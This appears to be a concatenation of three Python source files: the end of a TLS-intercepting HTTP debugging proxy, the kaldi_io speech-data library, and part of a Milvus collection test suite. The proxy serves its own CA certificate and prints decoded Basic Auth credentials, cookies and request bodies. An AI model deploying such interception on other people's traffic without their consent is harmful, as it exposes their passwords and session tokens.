def decode_content_body(self, data, encoding):
if encoding == 'identity':
text = data
elif encoding in ('gzip', 'x-gzip'):
io = StringIO(data)
with gzip.GzipFile(fileobj=io) as f:
text = f.read()
elif encoding == 'deflate':
try:
text = zlib.decompress(data)
except zlib.error:
text = zlib.decompress(data, -zlib.MAX_WBITS)
else:
raise Exception("Unknown Content-Encoding: %s" % encoding)
return text
def send_cacert(self):
with open(self.cacert, 'rb') as f:
data = f.read()
self.wfile.write("%s %d %s\r\n" % (self.protocol_version, 200, 'OK'))
self.send_header('Content-Type', 'application/x-x509-ca-cert')
self.send_header('Content-Length', len(data))
self.send_header('Connection', 'close')
self.end_headers()
self.wfile.write(data)
def print_info(self, req, req_body, res, res_body):
return
def parse_qsl(s):
return '\n'.join("%-20s %s" % (k, v) for k, v in urlparse.parse_qsl(s, keep_blank_values=True))
req_header_text = "%s %s %s\n%s" % (req.command, req.path, req.request_version, req.headers)
res_header_text = "%s %d %s\n%s" % (res.response_version, res.status, res.reason, res.headers)
print with_color(33, req_header_text)
u = urlparse.urlsplit(req.path)
if u.query:
query_text = parse_qsl(u.query)
print with_color(32, "==== QUERY PARAMETERS ====\n%s\n" % query_text)
cookie = req.headers.get('Cookie', '')
if cookie:
cookie = parse_qsl(re.sub(r';\s*', '&', cookie))
print with_color(32, "==== COOKIE ====\n%s\n" % cookie)
auth = req.headers.get('Authorization', '')
if auth.lower().startswith('basic'):
token = auth.split()[1].decode('base64')
print with_color(31, "==== BASIC AUTH ====\n%s\n" % token)
if req_body is not None:
req_body_text = None
content_type = req.headers.get('Content-Type', '')
if content_type.startswith('application/x-www-form-urlencoded'):
req_body_text = parse_qsl(req_body)
elif content_type.startswith('application/json'):
try:
json_obj = json.loads(req_body)
json_str = json.dumps(json_obj, indent=2)
if json_str.count('\n') < 50:
req_body_text = json_str
else:
lines = json_str.splitlines()
req_body_text = "%s\n(%d lines)" % ('\n'.join(lines[:50]), len(lines))
except ValueError:
req_body_text = req_body
elif len(req_body) < 1024:
req_body_text = req_body
if req_body_text:
print with_color(32, "==== REQUEST BODY ====\n%s\n" % req_body_text)
print with_color(36, res_header_text)
cookies = res.headers.getheaders('Set-Cookie')
if cookies:
cookies = '\n'.join(cookies)
print with_color(31, "==== SET-COOKIE ====\n%s\n" % cookies)
if res_body is not None:
res_body_text = None
content_type = res.headers.get('Content-Type', '')
if content_type.startswith('application/json'):
try:
json_obj = json.loads(res_body)
json_str = json.dumps(json_obj, indent=2)
if json_str.count('\n') < 50:
res_body_text = json_str
else:
lines = json_str.splitlines()
res_body_text = "%s\n(%d lines)" % ('\n'.join(lines[:50]), len(lines))
except ValueError:
res_body_text = res_body
elif content_type.startswith('text/html'):
m = re.search(r'<title[^>]*>\s*([^<]+?)\s*</title>', res_body, re.I)
if m:
h = HTMLParser()
print with_color(32, "==== HTML TITLE ====\n%s\n" % h.unescape(m.group(1).decode('utf-8')))
elif content_type.startswith('text/') and len(res_body) < 1024:
res_body_text = res_body
if res_body_text:
print with_color(32, "==== RESPONSE BODY ====\n%s\n" % res_body_text)
def request_handler(self, req, req_body):
pass
def response_handler(self, req, req_body, res, res_body):
pass
def save_handler(self, req, req_body, res, res_body):
self.print_info(req, req_body, res, res_body)
def test(HandlerClass=ProxyRequestHandler, ServerClass=ThreadingHTTPServer, protocol="HTTP/1.1"):
if sys.argv[1:]:
port = int(sys.argv[1])
else:
port = 8080
server_address = ('', port)
HandlerClass.protocol_version = protocol
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
print "Serving HTTP Proxy on", sa[0], "port", sa[1], "..."
httpd.serve_forever()
def run_server(port, lock, database_url, HandlerClass=ProxyRequestHandler, ServerClass=ThreadingHTTPServer, protocol="HTTP/1.1", ):
scoped_session = None
try:
server_address = ('', port)
HandlerClass.protocol_version = protocol
status, ret_scoped_session = database.init(database_url)
if not status:
return
scoped_session = ret_scoped_session
HandlerClass.ScopedSession = ret_scoped_session
HandlerClass.process_lock = lock
httpd = ServerClass(server_address, HandlerClass)
sa = httpd.socket.getsockname()
lock.acquire()
print "Serving HTTP Proxy on", sa[0], "port", sa[1], "...", '\n'
lock.release()
httpd.serve_forever()
database.session.close()
except Exception as e:
lock.acquire()
print(e)
lock.release()
traceback.print_exc()
def RunMultiProcess():
global route_table, mysession
init_json = None
try:
with open('init.json', 'r') as f:
init_json = json.load(f)
except Exception as e:
print("Loading Init Data Failed")
print(e)
else:
database_url = init_json['DataBaseUrl']
status, ret_scoped_session = database.init(database_url)
if not status:
return
ret_scoped_session.remove()
l = multiprocessing.Lock()
process = []
for port in init_json['RouteTable']:
route_table[int(port)] = init_json['RouteTable'][port]
p = Process(target=run_server, args=(int(port), l, database_url))
process.append(p)
p.start()
for p in process:
p.join()
# p = Process(target=run_server, args=(20000, l))
# p.start()
# p1 = Process(target=run_server, args=(20001, l))
# p1.start()
# p2 = Process(target=run_server, args=(20002, l))
# p2.start()
# p3 = Process(target=run_server, args=(20003, l))
# p3.start()
# p4 = Process(target=run_server, args=(20004, l))
# p4.start()
# p5 = Process(target=run_server, args=(20005, l))
# p5.start()
# p6 = Process(target=run_server, args=(20006, l))
# p6.start()
# p7 = Process(target=run_server, args=(20007, l))
# p7.start()
# p8 = Process(target=run_server, args=(20008, l))
# p8.start()
# p9 = Process(target=run_server, args=(20009, l))
# p9.start()
# p10 = Process(target=run_server, args=(20010, l))
# p10.start()
if __name__ == '__main__':
# test()
RunMultiProcess()
# if sys.argv[1:]:
# port = int(sys.argv[1])
# else:
# port = 8080
# l = multiprocessing.Lock()
# run_server(port, l, "sqlite:///D:\\DOWNLOAD\\Employers\\Richard\\proxy-admin\\proxyAdmin\\db.sqlite3" )
# run_server(port = 20001)
|
kaldi_io.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
import numpy as np
import sys, os, re, gzip, struct
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if not 'KALDI_ROOT' in os.environ:
# Default! To change run python with 'export KALDI_ROOT=/some_dir python'
os.environ['KALDI_ROOT']='/mnt/matylda5/iveselyk/Tools/kaldi-trunk'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:$KALDI_ROOT/tools/openfst/bin:$KALDI_ROOT/src/fstbin/:$KALDI_ROOT/src/gmmbin/:$KALDI_ROOT/src/featbin/:$KALDI_ROOT/src/lm/:$KALDI_ROOT/src/sgmmbin/:$KALDI_ROOT/src/sgmm2bin/:$KALDI_ROOT/src/fgmmbin/:$KALDI_ROOT/src/latbin/:$KALDI_ROOT/src/nnetbin:$KALDI_ROOT/src/nnet2bin:$KALDI_ROOT/src/nnet3bin:$KALDI_ROOT/src/online2bin/:$KALDI_ROOT/src/ivectorbin/:$KALDI_ROOT/src/lmbin/').readline().strip() + ':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Eventually seeks in the 'file' argument contains ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Eventually seek to offset,
if offset != None: fd.seek(int(offset))
return fd
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
assert(re.match('^\S+$',key) != None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Elements from int32 vector are sored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
return _read_vec_flt_binary(fd)
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
def _read_vec_flt_binary(fd):
header = fd.read(3).decode()
if header == 'FV ' : sample_size = 4 # floats
elif header == 'DV ' : sample_size = 8 # doubles
else : raise UnknownVectorHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimension,
assert (fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
# The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
col_headers = np.array([np.array([x for x in y]) * globrange * 1.52590218966964e-05 + globmin for y in col_headers], dtype=np.float32)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.zeros((cols,rows), dtype='float32')
p0 = col_headers[:, 0].reshape(-1, 1)
p25 = col_headers[:, 1].reshape(-1, 1)
p75 = col_headers[:, 2].reshape(-1, 1)
p100 = col_headers[:, 3].reshape(-1, 1)
mask_0_64 = (data <= 64)
mask_193_255 = (data > 192)
mask_65_192 = (~(mask_0_64 | mask_193_255))
mat += (p0 + (p25 - p0) / 64. * data) * mask_0_64.astype(np.float32)
mat += (p25 + (p75 - p25) / 128. * (data - 64)) * mask_65_192.astype(np.float32)
mat += (p75 + (p100 - p75) / 63. * (data - 192)) * mask_193_255.astype(np.float32)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename of opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
|
test_collection.py | from functools import reduce
import numpy
import pandas as pd
import pytest
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.util_pymilvus import *
from utils.util_log import test_log as log
prefix = "collection"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
exp_shards_num = "shards_num"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_shards_num = 2
uid_count = "collection_count"
tag = "collection_count_tag"
uid_stats = "get_collection_stats"
uid_create = "create_collection"
uid_describe = "describe_collection"
uid_drop = "drop_collection"
uid_has = "has_collection"
uid_list = "list_collections"
uid_load = "load_collection"
field_name = default_float_vec_field_name
default_single_query = {
"data": gen_vectors(1, default_dim),
"anns_field": default_float_vec_field_name,
"param": {"metric_type": "L2", "params": {"nprobe": 10}},
"limit": default_top_k,
}
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
default_nq = ct.default_nq
default_search_exp = "int64 >= 0"
default_limit = ct.default_limit
vectors = [[random.random() for _ in range(default_dim)] for _ in range(default_nq)]
default_search_field = ct.default_float_vec_field_name
default_search_params = {"metric_type": "L2", "params": {"nprobe": 10}}
class TestCollectionParams(TestcaseBase):
""" Test case of collection interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_none_removed_invalid_strings(self, request):
if request.param is None:
pytest.skip("None schema is valid")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_type_fields(self, request):
if isinstance(request.param, list):
pytest.skip("list is valid fields")
yield request.param
@pytest.fixture(scope="function", params=cf.gen_all_type_fields())
def get_unsupported_primary_field(self, request):
if request.param.dtype == DataType.INT64:
pytest.skip("int64 type is valid primary key")
yield request.param
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_invalid_dim(self, request):
if request.param == 1:
pytest.skip("1 is valid dim")
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_collection(self):
"""
target: test collection with default schema
method: create collection with default schema
expected: assert collection property
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
self.collection_wrap.init_collection(c_name, schema=default_schema,
check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema, exp_num: 0,
exp_primary: ct.default_int64_field_name})
assert c_name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
def test_collection_empty_name(self):
"""
target: test collection with empty name
method: create collection with an empty name
expected: raise exception
"""
self._connect()
c_name = ""
error = {ct.err_code: -1, ct.err_msg: f'`collection_name` value is illegal'}
self.collection_wrap.init_collection(c_name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", [[], 1, [1, "2", 3], (1,), {1: 1}, None])
def test_collection_illegal_name(self, name):
"""
target: test collection with illegal name
method: create collection with illegal name
expected: raise exception
"""
self._connect()
error = {ct.err_code: -1, ct.err_msg: "`collection_name` value {} is illegal".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("name", ["12-s", "12 s", "(mn)", "中文", "%$#", "a".join("a" for i in range(256))])
def test_collection_invalid_name(self, name):
"""
target: test collection with invalid name
method: create collection with invalid name
expected: raise exception
"""
self._connect()
error = {ct.err_code: 1, ct.err_msg: "Invalid collection name: {}".format(name)}
self.collection_wrap.init_collection(name, schema=default_schema, check_task=CheckTasks.err_res,
check_items=error)
@pytest.mark.tags(CaseLabel.L0)
def test_collection_dup_name(self):
"""
target: test collection with dup name
method: create collection with dup name and none schema and data
expected: collection properties consistent
"""
self._connect()
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, check_task=CheckTasks.check_collection_property,
check_items={exp_name: c_name, exp_schema: default_schema})
self.collection_wrap.init_collection(collection_w.name)
assert collection_w.name == self.collection_wrap.name
assert collection_w.schema == self.collection_wrap.schema
assert collection_w.num_entities == self.collection_wrap.num_entities
assert collection_w.name in self.utility_wrap.list_collections()[0]
@pytest.mark.tags(CaseLabel.L2)
